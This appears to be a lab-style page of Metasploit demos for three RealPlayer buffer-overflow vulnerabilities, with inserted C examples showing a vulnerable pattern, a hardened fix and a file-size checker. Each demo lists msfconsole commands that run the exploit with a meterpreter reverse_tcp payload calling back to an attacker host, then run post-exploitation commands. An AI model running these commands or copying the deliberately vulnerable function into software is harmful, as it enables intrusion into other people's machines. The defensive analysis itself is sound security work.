CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by suto
Coordinated public release of the vulnerability on 2012-12-14
Metasploit PoC provided on 2012-12-25

PoC provided by :

suto

Reference(s) :

CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory

Affected version(s) :

RealPlayer 15.0.5.109 and below

Tested on Windows XP Pro SP3 with :

RealPlayer 15.0.5.109

Description :

This module exploits a stack-based buffer overflow in RealPlayer versions prior to or equal to 15.0.6.14. The vulnerability exists in the handling of RealMedia files, due to the insecure use of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section: an over-long URL value overflows a fixed-size stack buffer. This module generates a malicious .rm file which must be opened with RealPlayer, either by drag and drop or by double-clicking it.

Commands :

use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sysinfo
getuid
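To make the description above concrete, here is an added example (not code from this page or from the Metasploit module) showing the vulnerable pattern beside a hardened one. It assumes the .rm file is INI-style text with an [InternetShortcut] section, and the 4096-byte size argument in the vulnerable function is an assumed value chosen for illustration; ini_get_string is a portable stand-in for the Win32 GetPrivateProfileString contract so the code runs off Windows.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Portable stand-in for the Win32 GetPrivateProfileString() contract:
 * locate "key=" inside "[section]" of an INI-style buffer and copy the value
 * into out, writing at most out_size bytes including the terminator.
 * Returns the number of characters copied, excluding the terminator. */
size_t ini_get_string(const char *ini, const char *section, const char *key,
                      char *out, size_t out_size)
{
    char hdr[64];
    size_t klen = strlen(key);
    const char *p;

    if (out_size == 0)
        return 0;
    out[0] = '\0';

    snprintf(hdr, sizeof hdr, "[%s]", section);
    p = strstr(ini, hdr);
    if (p == NULL)
        return 0;
    p += strlen(hdr);

    /* scan lines until the next section header or the end of the buffer */
    while (*p != '\0') {
        while (*p == '\r' || *p == '\n')
            p++;
        if (*p == '[' || *p == '\0')
            break;
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            size_t n = strcspn(v, "\r\n");
            if (n > out_size - 1)
                n = out_size - 1;   /* this cap is all that protects the caller */
            memcpy(out, v, n);
            out[n] = '\0';
            return n;
        }
        p += strcspn(p, "\r\n");
    }
    return 0;
}

/* Vulnerable pattern: the URL lands in a 256-byte stack buffer, but the size
 * handed to the lookup (4096 here, an assumed value) is much larger, so a long
 * URL= line overwrites the stack. Shown only for the pattern; never call it on
 * untrusted input. */
void vuln_read_url(const char *ini, char *copy, size_t copy_size)
{
    char url[256];
    ini_get_string(ini, "InternetShortcut", "URL", url, 4096); /* BUG: 4096 > sizeof url */
    snprintf(copy, copy_size, "%s", url);
}

/* Hardened form: the size argument is tied to the buffer with sizeof, and a
 * value that hit the cap is rejected instead of silently truncated.
 * Returns 1 when a URL was read intact, 0 when it is absent or too long. */
int safe_read_url(const char *ini, char *copy, size_t copy_size)
{
    char url[256];
    size_t n = ini_get_string(ini, "InternetShortcut", "URL", url, sizeof url);
    if (n == 0 || n == sizeof url - 1)
        return 0;
    snprintf(copy, copy_size, "%s", url);
    return 1;
}

/* Constructed stand-in for the file the module writes (assumption: INI-style
 * text with an InternetShortcut section). url_len filler bytes take the place
 * of the Metasploit buffer. Returns bytes written, 0 if buf is too small. */
size_t build_rm(char *buf, size_t buf_size, size_t url_len)
{
    const char prefix[] = "[InternetShortcut]\r\nURL=";
    size_t plen = sizeof prefix - 1;
    if (plen + url_len + 3 > buf_size)
        return 0;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'A', url_len);
    memcpy(buf + plen + url_len, "\r\n", 3);   /* includes the NUL */
    return plen + url_len + 2;
}

int main(void)
{
    char file[8192], out[512];
    build_rm(file, sizeof file, 40);
    printf("40-byte URL accepted: %d\n", safe_read_url(file, out, sizeof out));
    build_rm(file, sizeof file, 2000);
    printf("2000-byte URL accepted: %d\n", safe_read_url(file, out, sizeof out));
    return 0;
}
```

The fix is not the cap inside ini_get_string (the real API has one too); it is that safe_read_url passes the true buffer size and treats a capped value as an error, so the over-long URL the module writes is refused rather than copied past the end of the stack buffer.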

CVE-2011-2950 : RealNetworks RealPlayer QCP Parsing Heap Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2011-04-01
Coordinated public release of the vulnerability on 2011-08-16
Metasploit PoC provided on 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
RealNetworks RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in RealPlayer when handling a .QCP file. The flaw lies in qcpfformat.dll: a static 256-byte buffer is allocated on the heap, and user-supplied data from the file's "fmt" chunk is copied into it in a memory-copy loop with no length check. A remote attacker can thus execute arbitrary code in the context of the web browser by serving a .QCP file with a specially crafted "fmt" chunk. At the moment the module targets Windows XP with IE6 and IE7.

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo
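An added example, not part of the original page or of the Metasploit module: a small RIFF chunk walker that reports whether a QCP file's "fmt" chunk is declared larger than the 256-byte buffer the description mentions, the kind of check a file-scanning gateway could run before a file reaches the player. It relies on QCP being a RIFF container with form type "QLCM"; qcp_build produces a constructed minimal image (filler instead of real codec metadata), and the 256-byte limit is taken from the description above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define QCP_FMT_BUF 256   /* the static buffer size from the description */

static uint32_t rd32le(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32le(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* Walk the RIFF chunk list of an in-memory QCP file (form type "QLCM").
 * Return value:
 *   -1  not RIFF/QLCM, or a chunk claims more bytes than the file holds
 *    0  no "fmt " chunk
 *    1  "fmt " present and its declared size fits the 256-byte buffer
 *    2  "fmt " declared larger than 256 bytes: the overflow condition
 * *fmt_size receives the declared size when a "fmt " chunk is found.
 * The declared size is what an unbounded copy loop trusts, so for "fmt "
 * it is judged before the chunk is compared against the file length. */
int qcp_check_fmt(const unsigned char *buf, size_t len, uint32_t *fmt_size)
{
    size_t off = 12;

    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "QLCM", 4) != 0)
        return -1;

    while (off + 8 <= len) {
        uint32_t csize = rd32le(buf + off + 4);
        if (memcmp(buf + off, "fmt ", 4) == 0) {
            if (fmt_size != NULL)
                *fmt_size = csize;
            return csize > QCP_FMT_BUF ? 2 : 1;
        }
        /* chunk sizes are attacker-controlled: bound them before advancing */
        if (csize > len - off - 8)
            return -1;
        off += 8 + csize + (csize & 1);   /* RIFF pads odd chunks to even */
    }
    return 0;
}

/* Constructed minimal QCP image: RIFF header, a "fmt " chunk of fmt_len
 * filler bytes, and an empty "data" chunk. Real fmt chunks hold codec
 * metadata; the filler exists only to exercise the size check.
 * Returns the image length, or 0 if out is too small. */
size_t qcp_build(unsigned char *out, size_t out_size, uint32_t fmt_len)
{
    size_t pad = fmt_len & 1;
    size_t total = 12 + 8 + fmt_len + pad + 8;

    if (total > out_size)
        return 0;
    memcpy(out, "RIFF", 4);
    wr32le(out + 4, (uint32_t)(total - 8));
    memcpy(out + 8, "QLCM", 4);
    memcpy(out + 12, "fmt ", 4);
    wr32le(out + 16, fmt_len);
    memset(out + 20, 'A', fmt_len + pad);
    memcpy(out + 20 + fmt_len + pad, "data", 4);
    wr32le(out + 24 + fmt_len + pad, 0);
    return total;
}

int main(void)
{
    unsigned char img[4096];
    uint32_t sz = 0;
    int r;
    size_t n = qcp_build(img, sizeof img, 150);
    r = qcp_check_fmt(img, n, &sz);
    printf("fmt chunk %u bytes -> verdict %d\n", (unsigned)sz, r);
    n = qcp_build(img, sizeof img, 1024);
    r = qcp_check_fmt(img, n, &sz);
    printf("fmt chunk %u bytes -> verdict %d\n", (unsigned)sz, r);
    return 0;
}
```

A verdict of 2 is the file the module serves; a verdict of -1 on any other chunk is also worth blocking, since a size field that overruns the file is a sign of the same kind of tampering.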

CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI on 2009-11-24
Coordinated public release of the advisory on 2010-10-15
Saint PoC provided on 2010-10-22
Metasploit PoC provided on 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits an initialization flaw in RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure; the failure is improperly handled and uninitialized memory ends up being executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid